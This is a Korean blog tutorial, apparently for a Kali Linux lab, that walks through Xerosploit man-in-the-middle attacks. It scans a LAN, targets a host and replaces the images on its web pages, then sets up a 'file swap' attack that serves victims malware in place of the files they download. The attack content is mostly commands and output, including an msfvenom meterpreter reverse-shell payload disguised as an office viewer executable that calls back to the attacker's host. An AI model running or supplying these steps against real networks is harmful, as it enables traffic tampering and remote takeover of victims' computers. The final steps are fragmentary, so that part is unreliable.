Xerosploit 활용 - MITM 공격, 파일 바꿔치기 공격
System/Cybersecurity

Xerosploit 활용 - MITM 공격, 파일 바꿔치기 공격



원문 : https://condencia.postype.com/post/2568876

원문 등록 일시 : 2018.11.22



실습 환경 : Kali Linux


1. MITM (Man In The Middle) 공격


1) Xeroexploit 다운로드


git clone 명령어를 통해 Xeroexploit을 다운로드한다.

Kali Linux에는 git이 기본적으로 설치되어 있지만, 그렇지 않은 경우에는 개별적으로 git을 설치한다.


1
root@kali:/ git clone https://github.com/LionSec/xerosploit.git
cs


명령어를 실행한 위치의 디렉토리에 xerosploit이라는 폴더가 생성된다.



2) 실행


1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/ cd xerosploit
root@kali:~/xerosploit/ sudo python install.py
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘    
 
[++] Please choose your operating system.
 
1) Ubuntu / Kali linux / Others
2) Parrot OS
cs


이후로 python 쉘을 통해 단계별로 무엇을 할지 선택할 수 있다.

예를 들어 위 예시에서 OS를 선택하라고 했을 때, Linux를 사용하고 있다면 1이라고 입력하는 식이다.



3) Host Scan 및 타겟 지정

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[++] Please choose your operating system.
 
1) Ubuntu / Kali linux / Others
2) Parrot OS
>>> 1
>>> xerosploit
 
[+] Please type 'help' to view commands.
 
Xero ⇒ scan
[++] Mapping your network ...
[+]════════════[ Devices found on your network ]════════════[+]
╔════════════════╦═══════════════════╦═════════════════════╗
║ IP Address     ║   Mac Address     ║    Manufacturer     ║
╠════════════════╬═══════════════════╬═════════════════════╣
║ 192.168.86.1   ║ 00:50:59:D0:00:D2 ║ (VMware)            ║
║ 192.168.86.2   ║ 00:50:26:F5:88:02 ║ (VMware)            ║
║ 192.168.86.129 ║ 00:0B:31:D2:08:F7 ║ (VMware)            ║
║ 192.168.86.131 ║ 00:50:56:C0:00:D0 ║ (This device)       ║
║                ║                   ║                     ║
╚══════════════════════════════════════════════════════════╝ 
 
[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information
 
Xero ⇒ 
cs


Xerosploit의 scan 명령어는 리눅스의 nmap 명령어와 비슷한 기능을 한다. 같은 네트워크 대역 상의 호스트들을 scan한다.


1
2
3
4
5
6
7
Xero ⇒ 192.168.86.129
 
[++192.168.86.129 has been targeted.
 
[+] Which module d o you want to load ? Enter 'help' for more information.
 
Xero》modules ⇒
cs

target 호스트의 IP 주소를 입력하여 타겟으로 설정한다.



4. replace 모듈 선택 및 공격 실행


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Xero》modules ⇒ replace
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘
 
[+] Enter 'run' to execute the 'replace' command.
 
Xero》modules》replace ⇒ run
[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)
Xero》modules》replace ⇒ /root/Desktop/attack_img.png
 
[++] All images will be replaced by /root/Desktop/attack_img.png
 
[++] Press 'Ctrl + C' to stop .
cs





2. File 바꿔치기 공격 : windows 사용자가 파일을 다운받을 때 무슨 파일을 다운받던지 악성코드를 다운받을 수 있도록 한다.



1) 악성코드 준비

1
2
root@kali:/ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.86.131 lport=7777 -f exe > ~/malware/HOffice_2018_Viewer.exe
 
cs


msfvenom은 metasploit의 독립된 payload 생성기이다. lhost, lport에 주는 IP 주소와 포트는 Kali 리눅스의 IP 주소를 사용한다.


2) Xeroexploit 사용


1
2
3
Xero》modules》replace ⇒ run
Xero》modules》replace ⇒ zip
Xero》modules》replace ⇒ '/root/malware/test.exe'
cs